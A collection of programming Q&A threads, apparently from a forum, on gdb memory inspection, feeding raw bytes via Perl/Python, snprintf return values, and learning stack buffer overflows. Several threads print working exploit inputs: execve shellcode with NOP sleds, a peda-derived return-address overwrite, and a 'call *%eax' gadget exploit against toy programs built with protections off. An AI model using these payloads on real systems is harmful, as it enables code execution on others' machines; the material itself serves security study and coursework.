I am having difficulty in understanding the way print command of Perl interprets the hexadecimal values. I am using a very simple program of just 8 lines to demonstrate my question. Following code with gdb will explain my question in detail:
anil#anil-Inspiron-N5010:~/Desktop$ gcc -g code.c
anil#anil-Inspiron-N5010:~/Desktop$ gdb -q ./a.out
Reading symbols from ./a.out...done.
(gdb) list
1 #include <stdio.h>
2
3 int main(int argc, char* argv[])
4 {
5 int i;
6 for (i =0; i<argc; ++i)
7 printf ("%p\n", argv[i]);
8 return 0;
9 }
(gdb) break 8
Breakpoint 1 at 0x40057a: file code.c, line 8.
(gdb) run $(perl -e 'print "\xdd\xcc\xbb\xaa"') $(perl -e 'print "\xcc\xdd\xee\xff"')
Starting program: /home/anil/Desktop/a.out $(perl -e 'print "\xdd\xcc\xbb\xaa"') $(perl -e 'print "\xcc\xdd\xee\xff"')
0x7fffffffe35d
0x7fffffffe376
0x7fffffffe37b
Breakpoint 1, main (argc=3, argv=0x7fffffffdfe8) at code.c:8
8 return 0;
(gdb) x/2x argv[1]
0x7fffffffe376: 0xaabbccdd 0xeeddcc00
In above shown lines I have used gdb to debug the program. As command line arguments, I have passed two (hexadecimal) arguments (excluding the name of the program itself): \xdd\xcc\xbb\xaa and \xcc\xdd\xee\xff. Owing to the little-endian architecture, those arguments should be interpreted as 0xaabbccdd and 0xffeeddcc but as you can see the last line of above shown debugging shows 0xaabbccdd and 0xeeddcc00. Why is this so? What am I missing ?? This has happened with some other arguments too. I am requesting you to help me with this.
PS: 2^32 = 4294967296 and 0xffeeddcc = 4293844428 (2^32 > 0xffeeddcc). I don't know if still there is any connection.
Command-line arguments are NUL-terminated strings.
Arguments argv[1] is a pointer to the first character of a NUL-terminated string.
7FFFFFFFE376 DD CC BB AA 00
argv[2] is a pointer to the first character of a NUL-terminated string.
7FFFFFFFE37B CC DD EE FF 00
If you pay attention, you'll notice they happen to be located immediately one after the other in memory.
7FFFFFFFE376 DD CC BB AA 00 CC DD EE FF 00
You asked to print two (32-bit) integers starting at argv[1]
7FFFFFFFE376 DD CC BB AA 00 CC DD EE FF 00
----------- -----------
0xAABBCCDD 0xEEDDCC00
For x/2x to be correct, you would have needed to use
perl -e'print "\xdd\xcc\xbb\xaa\xcc\xdd\xee\xff"'
-or-
perl -e'print pack "i*", 0xaabbccdd, 0xffeeddcc'
For the arguments you passed, you need to use
(gdb) x argv[1]
0x3e080048cbd: 0xaabbccdd
(gdb) x argv[2]
0x3e080048cc2: 0xffeeddcc
You are confusing yourself by printing strings as numbers. In a little-endian architecture, in a four-byte value such as 0xDDCCBBAA, the bytes are numbered left-to-right from the starting address.
So let's take a look at the output of your debugger command:
(gdb) x/2x argv[1]
0x7fffffffe376: 0xaabbccdd 0xeeddcc00
Looking at that byte by byte, it would be:
0x7fffffffe376: dd
0x7fffffffe377: cc
0x7fffffffe378: bb
0x7fffffffe379: aa
0x7fffffffe37a: 00 # This NUL terminates argv[1]
0x7fffffffe37b: cc # This address corresponds to argv[2]
0x7fffffffe37c: dd
0x7fffffffe37d: ee
Which is not unexpected, no?
You might want to use something like this to display arguments in hex:
x/8bx argv[1]
(which will show 8 bytes in hexadecimal)
Related
I'm trying to learn buffer overflow but I found myself in dead end. When I want to execute shellcode gdb just stuck and dont react to anything (Ctrl-C, Ctrl-D, Enter, Esc) and I have to close terminal and run everything again. I have this vulnerable program running on Linux 64 bit:
int main(int argc, char **argv) {
char buffer[256];
if (argc != 2) {
exit(0);
}
printf("%p\n", buffer);
strcpy(buffer, argv[1]);
printf("%s\n", buffer);
return 0;
}
In gdb:
$ gcc vuln.c -o vuln -g -z execstack -fno-stack-protector
$ sudo gdb -q vuln
(gdb) list
1 #include <stdio.h>
2 #include <string.h>
3 #include <stdlib.h>
4
5 int main(int argc, char **argv) {
6 char buffer[256];
7 if (argc != 2) {
8 exit(0);
9 }
10 printf("%p\n", buffer);
(gdb) break 5
Breakpoint 1 at 0x4005de: file vuln.c, line 5.
(gdb) run $(python3 -c 'print("A" * 264 + "B" * 6)')
Starting program: /home/vladimir/workspace/hacking/vuln $(python3 -c 'print("A" * 264 + "B" * 6)')
Breakpoint 1, main (argc=2, argv=0x7fffffffe378) at vuln.c:7
7 if (argc != 2) {
(gdb) cont
Continuing.
0x7fffffffe190
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBB
Program received signal SIGSEGV, Segmentation fault.
0x0000424242424242 in ?? ()
(gdb) i r
rax 0x0 0
rbx 0x0 0
rcx 0x7ffff7b01ef4 140737348902644
rdx 0x7ffff7dd28c0 140737351854272
rsi 0x602260 6300256
rdi 0x0 0
rbp 0x4141414141414141 0x4141414141414141
rsp 0x7fffffffe2a0 0x7fffffffe2a0
r8 0xfffffffffffffff0 -16
r9 0xffffffffffffff00 -256
r10 0x60236e 6300526
r11 0x246 582
r12 0x4004e0 4195552
r13 0x7fffffffe370 140737488348016
r14 0x0 0
r15 0x0 0
rip 0x424242424242 0x424242424242
(gdb) run $(python3 -c 'print("\x48\x31\xff\x48\x31\xf6\x48\x31\xd2\x48\x31\xc0\x50\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x48\x89\xe7\xb0\x3b\x0f\x05" + "\x90" * 233 + "\x90\xe1\xff\xff\xff\x7f")')
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/vladimir/workspace/hacking/vuln $(python3 -c 'print("\x48\x31\xff\x48\x31\xf6\x48\x31\xd2\x48\x31\xc0\x50\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x48\x89\xe7\xb0\x3b\x0f\x05" + "\x90" * 233 + "\x90\xe1\xff\xff\xff\x7f")')
Breakpoint 1, main (argc=2, argv=0x7fffffffe288) at vuln.c:7
7 if (argc != 2) {
(gdb) cont
Continuing.
0x7fffffffe0a0
After address there is also printed some garbage and as said gdb get stucked. Even if I run program in the same session of gdb, with these two different inputs, the address of buffer somehow changes and I cant think of why. Can someone tell me why gdb stuck and why address is changing? What am I doing wrong?
Each time you run your compiled program, gdb will call the the linker to allocate some space for buffer. There's no guarantee that it will be in the same space each time, and gdb might deliberately put it somewhere else to keep different runs separate.
What you're doing with the C program here is causing an error which is trapped by the operating system and cleaned up. There's a huge gap between causing a simple buffer overflow and being able to use that to run shell commands. You have code to do the first bit, but you need a lot more insight to do the second bit.
If you really want to do this sort of thing, you're going to have to do a fair bit more reading to understand what's going on, and what you might be able to do.
The address changes because the stack pointer upon entering main depends on the total length of the command line arguments. The two python snippets generate data of different lengths.
I have a homework assignment to exploit a buffer overflow in the given program.
#include <stdio.h>
#include <stdlib.h>
int oopsIGotToTheBadFunction(void)
{
printf("Gotcha!\n");
exit(0);
}
int goodFunctionUserInput(void)
{
char buf[12];
gets(buf);
return(1);
}
int main(void)
{
goodFunctionUserInput();
printf("Overflow failed\n");
return(1);
}
The professor wants us to exploit the input gets(). We are not suppose to modify the code in any way, only create a malicious input that will create a buffer overflow. I've looked online but I am not sure how to go about doing this. I'm using gcc version 5.2.0 and Windows 10 version 1703. Any tips would be great!
Update:
I have looked up some tutorials and at least found the address for the hidden function I am trying to overflow into, but I am now stuck. I have been trying to run these commands:
gcc -g -o vuln -fno-stack-protector -m32 homework5.c
gdb ./vuln
disas main
break *0x00010880
run $(python -c "print('A'*256)")
x/200xb $esp
With that last command, it comes up saying "Value can't be converted to integer." I tried replacing esp to rsp because I am on a 64-bit but that came up with the same result. Is there a work around to this or another way to find the address of buf?
Since buf is pointing to an array of characters that are of length 12, inputing anything with a length greater than 12 should result in buffer overflow.
First, you need to find the offset to overwrite the Instruction pointer register (EIP).
Use gdb + peda is very useful:
$ gdb ./bof
...
gdb-peda$ pattern create 100 input
Writing pattern of 100 chars to filename "input"
...
gdb-peda$ r < input
Starting program: /tmp/bof < input
...
=> 0x4005c8 <goodFunctionUserInput+26>: ret
0x4005c9 <main>: push rbp
0x4005ca <main+1>: mov rbp,rsp
0x4005cd <main+4>: call 0x4005ae <goodFunctionUserInput>
0x4005d2 <main+9>: mov edi,0x40067c
[------------------------------------stack-------------------------------------]
0000| 0x7fffffffe288 ("(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL")
0008| 0x7fffffffe290 ("A)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL")
0016| 0x7fffffffe298 ("AA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL")
0024| 0x7fffffffe2a0 ("bAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL")
0032| 0x7fffffffe2a8 ("AcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL")
0040| 0x7fffffffe2b0 ("AAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL")
0048| 0x7fffffffe2b8 ("IAAeAA4AAJAAfAA5AAKAAgAA6AAL")
0056| 0x7fffffffe2c0 ("AJAAfAA5AAKAAgAA6AAL")
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0x00000000004005c8 in goodFunctionUserInput ()
gdb-peda$ patts
Registers contain pattern buffer:
R8+0 found at offset: 92
R9+0 found at offset: 56
RBP+0 found at offset: 16
Registers point to pattern buffer:
[RSP] --> offset 24 - size ~76
[RSI] --> offset 0 - size ~100
....
Now, you can overwrite the EIP register, the offset is 24 bytes. As in your homework just need print the "Gotcha!\n" string. Just jump to oopsIGotToTheBadFunction function.
Get the function address:
$ readelf -s bof
...
50: 0000000000400596 24 FUNC GLOBAL DEFAULT 13 oopsIGotToTheBadFunction
...
Make the exploit and got the results:
[manu#debian /tmp]$ python -c 'print "A"*24+"\x96\x05\x40\x00\x00\x00\x00\x00"' > input
[manu#debian /tmp]$ ./bof < input
Gotcha!
I am learning about buffer overrun with this source code:
#include <stdio.h>
int main()
{
char buf[16];
gets(buf);
printf("buf # %8p\n", (void*)&buf);
return 0;
}
I try to write Null character ('\0') to buf variable.
First, in gdb, I set the breakpoint at line 6, after the gets() function and run it with r <<< $(python -c 'print "\0"*11 + "AAAA"')
When I explore the stack, I realize it only write "AAAA" to buf. What happens?
(gdb) x/16xw &buf
0xffffcf80: 0x41414141 0xffffd000 0xffffd04c 0x080484a1
0xffffcf90: 0xf7fb43dc 0xffffcfb0 0x00000000 0xf7e1a637
0xffffcfa0: 0xf7fb4000 0xf7fb4000 0x00000000 0xf7e1a637
0xffffcfb0: 0x00000001 0xffffd044 0xffffd04c 0x00000000
But, when I run the program with r <<< $(python -c 'print "\1"*11 + "AAAA"'), the buf will be:
(gdb) x/16xw &buf
0xffffcf80: 0x01010101 0x01010101 0x41010101 0x00414141
0xffffcf90: 0xf7fb43dc 0xffffcfb0 0x00000000 0xf7e1a637
0xffffcfa0: 0xf7fb4000 0xf7fb4000 0x00000000 0xf7e1a637
0xffffcfb0: 0x00000001 0xffffd044 0xffffd04c 0x00000000
So the gets() function will not receive the Null character or the stdin will ignore it ?
P/S: I built it with gcc -m32 -fno-stack-protector -g stack.c -o stack on gcc (Ubuntu 5.4.0-6ubuntu1~16.04.4) 5.4.0 20160609.
Update: After some suggestions, I try this:
#include <stdio.h>
int main()
{
char buf[16];
gets(buf);
printf("buf # %8p\n", (void*)&buf);
for (int i = 0; i < 16; ++i) // this is for loop all the buf
{
printf("%02x ", buf[i]);
}
return 0;
}
It works with '\0'
$ gcc -g j_stack.c -o j_stack
$ python -c 'print "AAAA" + "\0"*6 + "AAAA"'| ./j_stack
buf # 0xffffcfbc
41 41 41 41 00 00 00 00 00 00 41 41 41 41 00 ffffffff
But how do I provide input which contains '\0' to buf in gdb program
No, it doesn't.
This behaviour has nothing to do with gets(), or with Python strings; it's due to the way you're providing input to your program, using a subshell and the Bash "herestring" syntax (which performs some manipulations on whatever you give it, apparently including dropping null bytes):
# python -c 'print "\0"*11 + "AAAA"' | wc -c
16
# python -c 'print "\0"*11 + "AAAA"' | hexdump
0000000 0000 0000 0000 0000 0000 4100 4141 0a41
0000010
# cat <<< $(python -c 'print "\0"*11 + "AAAA"') | wc -c
5
# hexdump <<< $(python -c 'print "\0"*11 + "AAAA"')
0000000 4141 4141 000a
0000005
# echo $(python -c 'print "\0"*11 + "AAAA"') | wc -c
5
If you run your program with a simple pipe, you should see the results you expect:
python -c 'print "\0"*11 + "AAAA"' | ./myProgram
No, gets does not ignore '\0'.
I changed your program to include
for(i = 0; i < 16; i++) printf("%02x", buf[i]);
printf("\n");
after calling gets. I ran the program on the input
abc\n
and saw
61626300000000000000000000000000
as I expected. I then ran the program on the input
ab\0c\n
and saw
61620063000000000000000000000000
which was also what I expected.
P.S. I'm not sure why you saw the behavior you did, but I confess I'm not sure what you're doing with <<< and those python fragments. Me, I used
echo abc | a.out
and
echo 616200630a | unhex | a.out
where unhex is a little program I have in my bin directory for, well, doing the obvious.
I was writing my own ncurses library and suddenly I found in GDB that snprintf() returned length larger than I specified. Is this defined behaviour or some mistake of mine ? The (reproducible) snippet code is this:
niko: snippets $ cat snprintf.c
#include <unistd.h>
#include <stdio.h>
char *example_string="This is a very long label. It was created to test alignment functions of VERTICAL and HORIZONTAL layout";
void snprintf_test(void) {
char tmp[72];
char fmt[32];
int len;
unsigned short x=20,y=30;
snprintf(fmt,sizeof(fmt),"\033[%%d;%%dH\033[0m\033[48;5;%%dm%%%ds",48);
len=snprintf(tmp,sizeof(tmp),fmt,y,x,0,example_string);
write(STDOUT_FILENO,tmp,len);
}
int main(void) {
snprintf_test();
}
niko: snippets $
Now we compile with debugging info and run:
niko: snippets $ gcc -g -o snprintf snprintf.c
niko: snippets $ gdb ./snprintf -ex "break snprintf_test" -ex run
.....
Reading symbols from ./snprintf...done.
Breakpoint 1 at 0x40058e: file snprintf.c, line 10.
Starting program: /home/deptrack/depserv/snippets/snprintf
Breakpoint 1, snprintf_test () at snprintf.c:10
10 unsigned short x=20,y=30;
Missing separate debuginfos, use: dnf debuginfo-install glibc-2.22-16.fc23.x86_64
(gdb) s
12 snprintf(fmt,sizeof(fmt),"\033[%%d;%%dH\033[0m\033[48;5;%%dm%%%ds",48);
(gdb) print sizeof(fmt)
$1 = 32
(gdb) print sizeof(tmp)
$2 = 72
(gdb) s
13 len=snprintf(tmp,sizeof(tmp),fmt,y,x,0,example_string);
(gdb) print fmt
$3 = "\033[%d;%dH\033[0m\033[48;5;%dm%48s\000\000\000\000\000"
(gdb) print example_string
$4 = 0x4006c0 "This is a very long label. It was created to test alignment functions of VERTICAL and HORIZONTAL layout"
(gdb) s
14 write(STDOUT_FILENO,tmp,len);
(gdb) print len
$5 = 124
(gdb) print sizeof(tmp)
$6 = 72
(gdb)
The program outputs garbage at the end of the string. As you can see, the len variable returned from snprintf() is indicating that function has printed more than the allowed size of 72. Is this a bug or my mistake? If this behaviour is defined, then why snprintf() docs say it will print at most n characters. Very misleading and bug prone statement. I will have to write my own snprintf() to solve this problem.
Actually (from "man snprintf"):
If the output was
truncated due to this limit then the return value is the number of
characters (excluding the terminating null byte) which would have been
written to the final string if enough space had been available.
Given this C program:
#include <stdio.h>
#include <string.h>
int main(int argc, char **argv) {
char buf[1024];
strcpy(buf, argv[1]);
}
Built with:
gcc -m32 -z execstack prog.c -o prog
Given shell code:
EGG=$(printf '\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/df')
The program is exploitable with the commands:
./prog $EGG$(python -c 'print "A" * 991 + "\x87\x83\x04\x08"')
./prog $EGG$(python -c 'print "A" * 991 + "\x0f\x84\x04\x08"')
where I got the addresses from:
$ objdump -d prog | grep call.*eax
8048387: ff d0 call *%eax
804840f: ff d0 call *%eax
I understand the meaning of the AAAA paddings in the middle, I calculated the 991 based on the length of buf in the program and the length of $EGG.
What I don't understand is why any of these addresses with call *%eax trigger the execution of the shellcode copied to the beginning of buf. As far as I understand, I'm overwriting the return address with 0x8048387 (or the other one), what I don't understand is why this leads to jumping to the shellcode.
I got this far by reading Smashing the stack for fun and profit. But the article uses a different approach of guessing a relative address to jump to the shellcode. I'm puzzled by why this more simple, alternative solution works, straight without guesswork.
The return value of strcpy is the destination (buf in this case) and that's passed using register eax. Thus if nothing destroys eax until main returns, eax will hold a pointer to your shell code.